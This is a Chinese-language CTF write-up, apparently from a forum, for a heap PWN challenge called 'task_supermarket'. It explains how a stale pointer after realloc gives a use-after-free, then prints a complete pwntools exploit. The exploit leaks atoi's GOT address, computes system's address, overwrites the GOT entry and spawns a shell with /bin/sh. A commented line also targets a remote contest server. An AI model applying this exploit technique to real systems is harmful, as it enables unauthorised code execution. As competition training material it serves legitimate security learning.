全国大学生信息安全竞赛-PWN
序言
第一次在大赛中做出PWN题, 心情有点小激动.
程序运行
0. 结构体
struct node{
char name[16];
int price;
int size;
char* des;
}commodity[15];
1.MENU
1. add a commodity
2. del a commodity
3. list commodities
4. Change the price of a commodity
5. Change the description of a commodity
6. exit
2. Add
add 一个 commodity, 输入name, price, descrip_size
3. Del
del一个commodity, 数组的指针会清零, des释放, price清零
4. list
列出所有内容,
5. Change the price(没什么用)
6. Change the description of a commodity
漏洞在realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原原指针, 重新分配内存. 但数组中的s指针并没有改成新分配的堆指针, 仍指向已释放的, 这点很重要. 此时又分配一个node, 恰好是这个已释放的堆, 那么上一个堆就可以编辑这个新分配的堆, 恐怖.
char *realloc(ptr, newSize)
char *ptr; /* Ptr to currently allocated block. If
* it's 0, then this procedure behaves
* identically to malloc. */
unsigned int newSize; /* Size of block after it is extended */
{
unsigned int curSize;
char *newPtr;
if (ptr == 0) {
return malloc(newSize);
}
curSize = Mem_Size(ptr);
if (newSize <= curSize) {
return ptr;
}
newPtr = malloc(newSize);
bcopy(ptr, newPtr, (int) curSize);
free(ptr);
return(newPtr);
}
过程
思路: 利用realloc函数产生的释放原指针, 程序没有更新指针. 实现修改leak memory求得system真实地址,修改atoi的got表值为system, 发送/bin/sh\x00.
步骤一
new("bill", 100, 0x80, "A"*0x80) # target
new("john", 200, 0x18, "A"*0x18) #
change_des("bill", 0xb0, "") # 下面结果可以看见bill的原指针已被释放
'''
chunk 0x9dde000 0x20 (inuse)
chunk 0x9dde020 0x88 (F) FD 0xf76e5700 BK 0xf76e57b0
chunk 0x9dde0a8 0x20 (inuse)
chunk 0x9dde0c8 0x20 (inuse)
chunk 0x9dde0e8 0xb8 (inuse)
'''
new("merry", 200, 0x50, "A"*0x7) # merry被分配到此处, bill可以编辑merry的s
步骤二: leak memory
payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59) # 泄露atoi的函数地址, 这也是为了确定远程的libc.so的版本, 然后使用libc-database找出其版本
change_des("bill", 0x80, payload)
list_all()
步骤三: modify
change_des("merry", 0x50, p32(system)) #修改merry, 输入system, 相当于修改atoi的got值为system地址
步骤四: get shell
p.sendline("/bin/sh\x00")
The Whole EXP
from pwn import *
p = process("./task_supermarket")
#p = remote("117.78.43.123", 31420)
elf = ELF("./task_supermarket")
#libc = ELF("./libc.so.6")
libc = ELF("./libc.so") #本机的libc
context.log_level = 'debug'
def new(name, price, size, des):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("price:")
p.sendline(str(price))
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(des)
def delete(name):
p.recvuntil("your choice>> ")
p.send("2\n")
p.recvuntil("name:")
p.sendline(name)
def list_all():
p.recvuntil("your choice>> ")
p.send("3\n")
def change_price(name, price):
p.recvuntil("your choice>> ")
p.sendline("4")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("or rise in:")
p.sendline(str(price))
def change_des(name, size, des):
p.recvuntil("your choice>> ")
p.sendline("5")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(des)
free_got = elf.got['free']
atoi = elf.got['atoi']
puts = elf.plt['puts']
gdb.attach(p)
new("bill", 100, 0x80, "A"*0x80)
new("john", 200, 0x18, "A"*0x18)
change_des("bill", 0xb0, "")
new("merry", 200, 0x50, "A"*0x7)
payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59)
change_des("bill", 0x80, payload)
list_all()
p.recvuntil("merry: price.")
p.recv(16)
real_atoi = u32(p.recv(4))
system = real_atoi - (libc.symbols['atoi'] - libc.symbols['system'])
log.info("real_atoi: %s" % hex(real_atoi))
log.info("system: %s" % hex(system))
change_des("merry", 0x50, p32(system))
p.recvuntil("your choice>> ")
p.sendline("/bin/sh\x00")
p.interactive()
Related Link
相关文件
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
最后于 2018-4-30 18:41
被baolongshou编辑
,原因:
